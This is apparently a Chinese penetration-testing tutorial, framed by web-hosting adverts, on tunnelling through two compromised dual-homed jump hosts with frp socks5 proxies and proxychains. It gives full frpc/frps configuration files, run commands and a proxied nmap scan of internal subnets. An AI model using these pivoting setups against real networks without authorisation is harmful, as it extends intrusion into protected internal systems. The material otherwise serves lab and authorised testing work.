十年網(wǎng)站開發(fā)經(jīng)驗 + 多家企業(yè)客戶 + 靠譜的建站團隊
量身定制 + 運營維護+專業(yè)推廣+無憂售后,網(wǎng)站問題一站解決
10.1.200.10 攻擊機
10.1.200.20/172. 16.200.20 跳板機1
172.16.30/192.168.33.30 跳板機2
192.168.33.66 目標frpc是frp的客戶端客戶端一般安裝在被滲透機器上,在不需要雙層內網(wǎng)滲透的情況下只需要上傳frpc
配置文件:
[common]
server_addr = 192.168.1.20 //frps服務ip
server_port = 7000 //frps服務端口
[socks5]
type = tcp
plugin = socks5
remote_port = 5000 //滲透機或跳板機使用的端口frps是frp的服務端frps是frp的服務端單層內網(wǎng)情況下只安裝在滲透機,雙層內網(wǎng)需要安裝在跳板機中。
配置文件:
[common]
bind_port = 7000 //frps的服務端的端口運行frpc: ./frpc -c frpc.ini(配置文件)
frps: ./frps -c frps.ini(配置文件)配置使用的代理(linux)leafpad /etc/proxychains.conf
添加socks5 127.0.0.1 5000,這里的5000對應上frpc.ini配置文件中的socks5代理端口
proxychains nmap -Pn -sT -T4 192.168.1.20 代理nmap掃描雙層內網(wǎng)配置滲透機
proxychains.conf配置
socks5 127.0.0.1 8000 172段
socks5 127.0.0.1 9000 192段
10.1.200.10 本機ip10.1.200.10,代理端口8000 172段 代理端口9000 192段
frps配置:
[common]
bind_port = 7000 //frps服務的端口非代理端口
跳板機1
10.1.200.20/172. 16.200.20 //雙網(wǎng)卡主機
frps配置
[common]
bind_port = 7000 //frps服務的端口非代理端口
frpc配置
[common]
server_addr = 10.1.200.10
server_port = 7000
[socks5_172]
type = tcp
plugin = socks5
remote_port = 8000 //172段sockts5代理端口(滲透機)
[socks5_192]
type = tcp
local_ip = 127.0.0.1
local_port = 9999 //跳板機2的sockts5代理端口
remote_port = 9000 //192段sockts5代理端口(滲透機)
說明:跳板機1向滲透機代理兩個sockts5端口分別是8000端口和9000端口,8000端口代表172段是跳板機本機能訪問的,
9000端口是192段跳板機1本來是不能訪問但是獲取了跳板機2的權限配置了代理因此可以相當于轉發(fā)了跳板機2的流量。
跳板機2
172.16.30/192.168.33.30 //雙網(wǎng)卡主機
frpc配置
[common]
server_addr = 172. 16.200.20
server_port = 7000
[socks5_192_172]
type = tcp
plugin = socks5
remote_port = 9999
說明:跳板機2只需要配置frpc即可,frps的ip地址填寫的是跳板機1的ip并且對應上跳板機1的sockts5代理端口,最終使得滲透機可以訪問目標。
你是否還在尋找穩(wěn)定的海外服務器提供商?創(chuàng)新互聯(lián)www.cdcxhl.cn海外機房具備T級流量清洗系統(tǒng)配攻擊溯源,準確流量調度確保服務器高可用性,企業(yè)級服務器適合批量采購,新人活動首月15元起,快前往官網(wǎng)查看詳情吧
